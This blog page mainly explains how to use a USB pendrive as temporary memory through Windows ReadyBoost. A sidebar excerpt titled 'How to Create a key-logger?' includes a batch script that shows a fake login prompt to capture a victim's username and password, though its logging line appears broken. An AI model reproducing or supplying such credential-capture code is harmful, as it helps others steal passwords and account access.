Skip to main content

How to use Pendrive as RAM in your windows PC

This method we are going to describe, will increase the RAM temporary,not permanent.Users just need to have a pendrive which can be used as a portable RAM on the PC running on Windows OS.



You need to plug your Pendrive and then after it is plugged click the pendrive and format it.


Now click properties and then go to "ReadyBoost"  

                                                  







Here you will see 3 options ,don't use this device -Dedicate the device to ReadyBoost- Select option "Use this Device".









Now you can use your pendrive as a temporary RAM and you need to keep atleast 400-500MB of free space while adjusting the size of memory and apply.


This is how you can use Pendrive as a RAM memory.






If any doubt regarding this mail me @



Comments

Post a Comment

Popular posts from this blog

Why Do We Have QWERTY Keyboard, Not ABCDE?

Why Do We Have QWERTY Keyboard, Not ABCDE? In electronic devices, there are several types of keyboards among which stand out the standard PC type keyboards. Yes, we are talking about the ones we use when using a computer. Out of all others, QWERTY is the most popular and common. However, have you ever wondered what motivates the order of computer keyboard letters? For this arrangement, known as QWERTY. So, if you are looking for the answer why our computer keyboard letters arranged as QWERTY instead of ABCDE then here we are going to share a reasonable answer.   As we already mentioned, there are lots of keyboards made for computers that use different dimensions and arrangement of keys. However, QWERTY is the most common one.  It was designed around 1968 and has the peculiarity that its name (QWERTY) is the first six letters of its upper row of keys.   The reason dates back to the time where people used typewriters. When the typewriter was first invente...

How to use android device as keyboard and mouse to your pc

Here we are going to see how to use Android device as keyboard and mouse in your PC. Download and Install Intel Remote Keyboard on your Android device and also install Intel Remote Keyboard Host on your windows computer. Make sure your computer and your Android device is connected to the same WiFi network and the on your android device scan for your windows device. Tap on the Windows device name.Now your Windows PC will show you a QR code , scan it with your Android device. Now both the devices will be paired and you use your Android device as mouse and keyboard for your computer. You can also Switch user,Log off,Sleep,Restart and also Shutdown from your Android device. I hope this article is useful if any doubt mail me at.

How to Create a key-logger?

The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad. What is Key-logger?  A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information . HOW TO MAKE A KEY-LOGGER?  Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad. Open notepad on your Windows and paste the script given below. @echo off  color a title Login cls echo Please Enter Your Email Address and Password echo. echo. cd C:\Logs set /p user= Username: set /p pass=Password: echo Username="%user%" Password="%pass%" Log.txt start http://TechiViewer.com/ exit ...